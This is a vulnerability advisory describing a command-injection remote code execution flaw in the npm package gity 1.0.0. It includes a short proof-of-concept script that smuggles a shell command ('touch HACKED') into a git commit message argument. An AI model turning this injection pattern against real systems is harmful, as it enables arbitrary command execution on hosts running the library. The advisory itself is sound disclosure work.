gity@1.0.0

Vulnerabilities

1 via 1 paths

Dependencies

3

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity

Remote Code Execution (RCE)

  • Vulnerable module: gity
  • Introduced through: gity@1.0.0

Detailed paths

  • Introduced through: gity@1.0.0

Overview

gity is a Git wrapper for Node.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). A user input is formatted inside a command that will be executed without any check.

PoC by mik317

  • Create the following PoC file:
    // poc.js
    var Git = require('gity');
    

var git = Git() .add('*.js') .commit('-m "added js files";touch HACKED;#') .run();


* Check there aren't files called `HACKED`
* Execute the following commands in another terminal:

npm i gity # Install affected module node poc.js # Run the PoC

* Recheck the files: now `HACKED` has been created
## Remediation
There is no fixed version for `gity`.
## References
- [HackerOne Report](https://hackerone.com/reports/730111)
- [Vulnerable Code](https://hackerone.com/redirect?signature=83666e53042da3c66e97c9afe213f17e5c0d75b0&url=https%3A%2F%2Fgithub.com%2Fstevenmiller888%2Fgity%2Fblob%2Fmaster%2Flib%2Findex.js%23L85)